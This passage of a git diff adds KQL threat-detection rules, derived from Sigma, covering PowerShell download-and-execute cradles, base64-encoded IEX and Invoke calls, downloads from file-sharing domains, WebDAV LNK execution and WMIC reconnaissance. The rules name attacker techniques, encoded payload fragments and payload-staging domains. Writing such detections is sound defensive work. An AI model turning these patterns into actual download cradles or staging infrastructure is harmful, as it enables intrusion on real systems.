"\\csc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") or (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\TEMP\\" or FolderPath contains "\\AppData\\Local\\Temp") or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -encodedcommand " or ProcessCommandLine contains " -w hidden" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "http" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-")) and InitiatingProcessFolderPath contains "\\PDQDeployRunner-" \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql b/KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql new file mode 100644 index 00000000..b018e74b --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql @@ -0,0 +1,10 @@ +// Title: Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-23 +// Level: high +// Description: Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql b/KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql new file mode 100644 index 00000000..099c6c56 --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Inline JavaScript Execution via NodeJS Binary +// Author: Microsoft (idea), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-04-21 +// Level: medium +// Description: Detects potentially suspicious inline JavaScript execution using Node.js with specific keywords in the command line. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.007 +// False Positives: +// - Legitimate scripts using Node.js with these modules + +DeviceProcessEvents +| where (ProcessCommandLine contains "http" and ProcessCommandLine contains "execSync" and ProcessCommandLine contains "spawn" and ProcessCommandLine contains "fs" and ProcessCommandLine contains "path" and ProcessCommandLine contains "zlib") and (FolderPath endswith "\\node.exe" or ProcessVersionInfoOriginalFileName =~ "node.exe" or ProcessVersionInfoProductName =~ "Node.js") \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql b/KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql new file mode 100644 index 00000000..5241b710 --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql @@ -0,0 +1,10 @@ +// Title: Potentially Suspicious Named Pipe Created Via Mkfifo +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-16 +// Level: medium +// Description: Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where ProcessCommandLine contains " /tmp/" and FolderPath endswith "/mkfifo" \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql b/KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql new file mode 100644 index 00000000..de91eb39 --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql @@ -0,0 +1,10 @@ +// Title: Potentially Suspicious WebDAV LNK Execution +// Author: Micah Babinski +// Date: 2023-08-21 +// Level: medium +// Description: Detects possible execution via LNK file accessed on a WebDAV server. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.t1204 + +DeviceProcessEvents +| where ProcessCommandLine contains "\\DavWWWRoot\\" and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\explorer.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_as_a_service_in_registry.kql b/KQL/rules/Execution/powershell_as_a_service_in_registry.kql new file mode 100644 index 00000000..c1021955 --- /dev/null +++ b/KQL/rules/Execution/powershell_as_a_service_in_registry.kql @@ -0,0 +1,10 @@ +// Title: PowerShell as a Service in Registry +// Author: oscd.community, Natalia Shornikova +// Date: 2020-10-06 +// Level: high +// Description: Detects that a powershell code is written to the registry as a service. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1569.002 + +DeviceRegistryEvents +| where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and RegistryKey endswith "\\Services*" and RegistryKey endswith "\\ImagePath" \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql b/KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql new file mode 100644 index 00000000..a8a14e98 --- /dev/null +++ b/KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql @@ -0,0 +1,10 @@ +// Title: PowerShell Base64 Encoded IEX Cmdlet +// Author: Florian Roth (Nextron Systems) +// Date: 2019-08-23 +// Level: high +// Description: Detects usage of a base64 encoded "IEX" cmdlet in a process command line +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "SUVYIChb" or ProcessCommandLine contains "lFWCAoW" or ProcessCommandLine contains "JRVggKF" or ProcessCommandLine contains "aWV4IChb" or ProcessCommandLine contains "lleCAoW" or ProcessCommandLine contains "pZXggKF" or ProcessCommandLine contains "aWV4IChOZX" or ProcessCommandLine contains "lleCAoTmV3" or ProcessCommandLine contains "pZXggKE5ld" or ProcessCommandLine contains "SUVYIChOZX" or ProcessCommandLine contains "lFWCAoTmV3" or ProcessCommandLine contains "JRVggKE5ld" or ProcessCommandLine contains "SUVYKF" or ProcessCommandLine contains "lFWChb" or ProcessCommandLine contains "JRVgoW" or ProcessCommandLine contains "aWV4KF" or ProcessCommandLine contains "lleChb" or ProcessCommandLine contains "pZXgoW" or ProcessCommandLine contains "aWV4KE5ld" or ProcessCommandLine contains "lleChOZX" or ProcessCommandLine contains "pZXgoTmV3" or ProcessCommandLine contains "SUVYKE5ld" or ProcessCommandLine contains "lFWChOZX" or ProcessCommandLine contains "JRVgoTmV3" or ProcessCommandLine contains "SUVYKCgn" or ProcessCommandLine contains "lFWCgoJ" or ProcessCommandLine contains "JRVgoKC" or ProcessCommandLine contains "aWV4KCgn" or ProcessCommandLine contains "lleCgoJ" or ProcessCommandLine contains "pZXgoKC") or (ProcessCommandLine contains "SQBFAFgAIAAoAFsA" or ProcessCommandLine contains "kARQBYACAAKABbA" or ProcessCommandLine contains "JAEUAWAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAFsA" or ProcessCommandLine contains "kAZQB4ACAAKABbA" or ProcessCommandLine contains "pAGUAeAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAE4AZQB3A" or ProcessCommandLine contains "kAZQB4ACAAKABOAGUAdw" or ProcessCommandLine contains "pAGUAeAAgACgATgBlAHcA" or ProcessCommandLine contains "SQBFAFgAIAAoAE4AZQB3A" or ProcessCommandLine contains "kARQBYACAAKABOAGUAdw" or ProcessCommandLine contains "JAEUAWAAgACgATgBlAHcA") \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql b/KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql new file mode 100644 index 00000000..41da956b --- /dev/null +++ b/KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql @@ -0,0 +1,10 @@ +// Title: PowerShell Base64 Encoded Invoke Keyword +// Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t +// Date: 2022-05-20 +// Level: high +// Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027 + +DeviceProcessEvents +| where ProcessCommandLine contains " -e" and (ProcessCommandLine contains "SQBuAHYAbwBrAGUALQ" or ProcessCommandLine contains "kAbgB2AG8AawBlAC0A" or ProcessCommandLine contains "JAG4AdgBvAGsAZQAtA" or ProcessCommandLine contains "SW52b2tlL" or ProcessCommandLine contains "ludm9rZS" or ProcessCommandLine contains "JbnZva2Ut") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql b/KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql new file mode 100644 index 00000000..fdd6da7a --- /dev/null +++ b/KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql @@ -0,0 +1,12 @@ +// Title: PowerShell Base64 Encoded Reflective Assembly Load +// Author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems) +// Date: 2022-03-01 +// Level: high +// Description: Detects base64 encoded .NET reflective loading of Assembly +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027, attack.t1620 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" or ProcessCommandLine contains "AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC" or ProcessCommandLine contains "BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp" or ProcessCommandLine contains "AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK" or ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA" or ProcessCommandLine contains "WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql b/KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql new file mode 100644 index 00000000..3c650e17 --- /dev/null +++ b/KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql @@ -0,0 +1,10 @@ +// Title: PowerShell Base64 Encoded WMI Classes +// Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-30 +// Level: high +// Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027 + +DeviceProcessEvents +| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and ((ProcessCommandLine contains "VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg" or ProcessCommandLine contains "V2luMzJfTG9nZ2VkT25Vc2Vy" or ProcessCommandLine contains "dpbjMyX0xvZ2dlZE9uVXNlc" or ProcessCommandLine contains "XaW4zMl9Mb2dnZWRPblVzZX") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw" or ProcessCommandLine contains "cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA" or ProcessCommandLine contains "V2luMzJfUHJvY2Vzc" or ProcessCommandLine contains "dpbjMyX1Byb2Nlc3" or ProcessCommandLine contains "XaW4zMl9Qcm9jZXNz") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg" or ProcessCommandLine contains "V2luMzJfU2NoZWR1bGVkSm9i" or ProcessCommandLine contains "dpbjMyX1NjaGVkdWxlZEpvY" or ProcessCommandLine contains "XaW4zMl9TY2hlZHVsZWRKb2") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A" or ProcessCommandLine contains "V2luMzJfU2hhZG93Y29we" or ProcessCommandLine contains "dpbjMyX1NoYWRvd2NvcH" or ProcessCommandLine contains "XaW4zMl9TaGFkb3djb3B5") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A" or ProcessCommandLine contains "cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA" or ProcessCommandLine contains "V2luMzJfVXNlckFjY291bn" or ProcessCommandLine contains "dpbjMyX1VzZXJBY2NvdW50" or ProcessCommandLine contains "XaW4zMl9Vc2VyQWNjb3Vud")) \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql b/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql new file mode 100644 index 00000000..838b3eab --- /dev/null +++ b/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql @@ -0,0 +1,15 @@ +// Title: PowerShell Core DLL Loaded By Non PowerShell Process +// Author: Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2019-11-14 +// Level: medium +// Description: Detects loading of essential DLLs used by PowerShell by non-PowerShell process. +Detects behavior similar to meterpreter's "load powershell" extension. + +// MITRE Tactic: Execution +// Tags: attack.t1059.001, attack.execution +// False Positives: +// - Used by some .NET binaries, minimal on user workstation. +// - Used by Microsoft SQL Server Management Studio + +DeviceImageLoadEvents +| where (InitiatingProcessVersionInfoFileDescription =~ "System.Management.Automation" or InitiatingProcessVersionInfoOriginalFileName =~ "System.Management.Automation.dll" or (FolderPath endswith "\\System.Management.Automation.dll" or FolderPath endswith "\\System.Management.Automation.ni.dll")) and (not(((InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\")) or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\dsac.exe", "C:\\WINDOWS\\System32\\RemoteFXvGPUDisablement.exe", "C:\\Windows\\System32\\runscripthelper.exe", "C:\\WINDOWS\\System32\\sdiagnhost.exe", "C:\\Windows\\System32\\ServerManager.exe", "C:\\Windows\\System32\\SyncAppvPublishingServer.exe", "C:\\Windows\\System32\\winrshost.exe", "C:\\Windows\\System32\\wsmprovhost.exe", "C:\\Windows\\SysWOW64\\winrshost.exe", "C:\\Windows\\SysWOW64\\wsmprovhost.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")) or ((InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and InitiatingProcessFolderPath endswith "\\pwsh.exe")))) and (not((isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath startswith "C:\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessFolderPath endswith "\\Citrix\\ConfigSync\\ConfigSyncRun.exe" or ((InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\") or (InitiatingProcessFolderPath endswith "\\IDE\\Ssms.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft SQL Server Management Studio" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server Management Studio")) or (InitiatingProcessFolderPath endswith "\\Tools\\Binn\\SQLPS.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft SQL Server\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\")))) \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_download_and_execution_cradles.kql b/KQL/rules/Execution/powershell_download_and_execution_cradles.kql new file mode 100644 index 00000000..9717cb71 --- /dev/null +++ b/KQL/rules/Execution/powershell_download_and_execution_cradles.kql @@ -0,0 +1,12 @@ +// Title: PowerShell Download and Execution Cradles +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-24 +// Level: high +// Description: Detects PowerShell download and execution cradles. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Some PowerShell installers were seen using similar combinations. Apply filters accordingly + +DeviceProcessEvents +| where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Invoke-RestMethod " or ProcessCommandLine contains "irm ") and (ProcessCommandLine contains ";iex $" or ProcessCommandLine contains "| IEX" or ProcessCommandLine contains "|IEX " or ProcessCommandLine contains "I`E`X" or ProcessCommandLine contains "I`EX" or ProcessCommandLine contains "IE`X" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "IEX (" or ProcessCommandLine contains "IEX(" or ProcessCommandLine contains "Invoke-Expression") \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_download_pattern.kql b/KQL/rules/Execution/powershell_download_pattern.kql new file mode 100644 index 00000000..b36d6c9d --- /dev/null +++ b/KQL/rules/Execution/powershell_download_pattern.kql @@ -0,0 +1,10 @@ +// Title: PowerShell Download Pattern +// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro +// Date: 2019-01-16 +// Level: medium +// Description: Detects a Powershell process that contains download commands in its command line string +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "string(" or ProcessCommandLine contains "file(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "net.webclient)." and ProcessCommandLine contains "download")) and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql b/KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql new file mode 100644 index 00000000..2cf959b8 --- /dev/null +++ b/KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql @@ -0,0 +1,12 @@ +// Title: PowerShell Execution With Potential Decryption Capabilities +// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-30 +// Level: high +// Description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "Get-ChildItem " or ProcessCommandLine contains "dir " or ProcessCommandLine contains "gci " or ProcessCommandLine contains "ls ") and (ProcessCommandLine contains "Get-Content " or ProcessCommandLine contains "gc " or ProcessCommandLine contains "cat " or ProcessCommandLine contains "type " or ProcessCommandLine contains "ReadAllBytes") and ((ProcessCommandLine contains " ^| " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "-Recurse" and ProcessCommandLine contains "-Skip ") or (ProcessCommandLine contains " -ExpandProperty " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "WriteAllBytes" and ProcessCommandLine contains " .length ")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_inline_execution_from_a_file.kql b/KQL/rules/Execution/powershell_inline_execution_from_a_file.kql new file mode 100644 index 00000000..dc383340 --- /dev/null +++ b/KQL/rules/Execution/powershell_inline_execution_from_a_file.kql @@ -0,0 +1,10 @@ +// Title: Powershell Inline Execution From A File +// Author: frack113 +// Date: 2022-12-25 +// Level: medium +// Description: Detects inline execution of PowerShell code from a file +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-Expression " or ProcessCommandLine contains "Invoke-Command " or ProcessCommandLine contains "icm ") and ProcessCommandLine contains " -raw" and (ProcessCommandLine contains "cat " or ProcessCommandLine contains "get-content " or ProcessCommandLine contains "type ") \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql b/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql new file mode 100644 index 00000000..272c80d0 --- /dev/null +++ b/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql @@ -0,0 +1,14 @@ +// Title: PowerShell MSI Install via WindowsInstaller COM From Remote Location +// Author: Meroujan Antonyan (vx3r) +// Date: 2025-06-05 +// Level: medium +// Description: Detects the execution of PowerShell commands that attempt to install MSI packages via the +Windows Installer COM object (`WindowsInstaller.Installer`) hosted remotely. +This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality. +And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-ComObject" and ProcessCommandLine contains "InstallProduct(") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "http" or ProcessCommandLine contains "\\\\")) and (not((ProcessCommandLine contains "://127.0.0.1" or ProcessCommandLine contains "://localhost"))) \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_script_execution_policy_enabled.kql b/KQL/rules/Execution/powershell_script_execution_policy_enabled.kql new file mode 100644 index 00000000..5d5ca8da --- /dev/null +++ b/KQL/rules/Execution/powershell_script_execution_policy_enabled.kql @@ -0,0 +1,12 @@ +// Title: PowerShell Script Execution Policy Enabled +// Author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo +// Date: 2023-10-18 +// Level: low +// Description: Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Likely + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\EnableScripts" \ No newline at end of file diff --git a/KQL/rules/Execution/powershell_script_run_in_appdata.kql b/KQL/rules/Execution/powershell_script_run_in_appdata.kql new file mode 100644 index 00000000..ab84e448 --- /dev/null +++ b/KQL/rules/Execution/powershell_script_run_in_appdata.kql @@ -0,0 +1,12 @@ +// Title: PowerShell Script Run in AppData +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +// Date: 2019-01-09 +// Level: medium +// Description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Administrative scripts + +DeviceProcessEvents +| where (ProcessCommandLine contains "powershell.exe" or ProcessCommandLine contains "\\powershell" or ProcessCommandLine contains "\\pwsh" or ProcessCommandLine contains "pwsh.exe") and ((ProcessCommandLine contains "Local\\" or ProcessCommandLine contains "Roaming\\") and (ProcessCommandLine contains "/c " and ProcessCommandLine contains "\\AppData\\")) \ No newline at end of file diff --git a/KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql new file mode 100644 index 00000000..d78c66d2 --- /dev/null +++ b/KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql @@ -0,0 +1,10 @@ +// Title: Process Reconnaissance Via Wmic.EXE +// Author: frack113 +// Date: 2022-01-01 +// Level: medium +// Description: Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents +| where (ProcessCommandLine contains "process" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "call" and ProcessCommandLine contains "create"))) \ No newline at end of file diff --git a/KQL/rules/Execution/psexec_execution.kql b/KQL/rules/Execution/psexec_execution.kql new file mode 100644 index 00000000..8b319c6f --- 